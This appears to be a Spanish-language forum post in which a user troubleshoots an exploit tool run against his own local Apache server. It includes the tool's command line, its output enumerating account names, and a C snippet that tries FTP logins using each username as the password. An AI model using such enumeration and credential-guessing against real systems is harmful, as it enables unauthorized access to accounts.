Bien, por fin conseguí hacer que se me iniciara el Apache.
Simplemente tuve que terminar los procesos que utilizaban el puerto 80.
Utilizo este comando:
exploit.exe -f -h localhost -u users.txt
En vez de localhost, también puedo usar mi IP local.
Me muestra los usuarios del archivo perfectamente.
El problema viene después.
Me sale que se ha conectado bien por FTP, pero justo después me dice que exploit.exe deja de funcionar.
- verifying list: OK (3 users)
- verifying host: OK
- connecting: OK
- verifying Apache: OK
- vulnerable: OK
- searching for system accounts, please wait...
- processing user #4
- scan result for localhost:
found username: Admin
found username: SySc0d3r
found username: User
- trying log on via FTP...
- connecting: OK
Y ahí me sale que dejó de funcionar
No sé cuál puede ser el problema, parece que el FTP no es.
De todas formas también probaré con el POP3 (aunque no tengo ni idea de cómo se usa).
if(optftp == 1) {
stop = 0;
printf(" [+] trying log on via FTP...\n");
printf(" [+] connecting:\t");
if(mkconn(host, FTP_PORT) == TCPIP_ERROR) {
printf("Closed\n");
stop = 1;
}
if(!stop) {
printf("OK\n");
closesocket(sockfd);
for(i=0; i < cant; i++) {
if(trylogonFTP(host, fuser[i], fuser[i]) == 0) {
printf(" logged in: %s\n", fuser[i]);
flogged++;
}
}
if(flogged == 0) printf(" no users logged in\n");
}
}
Un saludo Ivan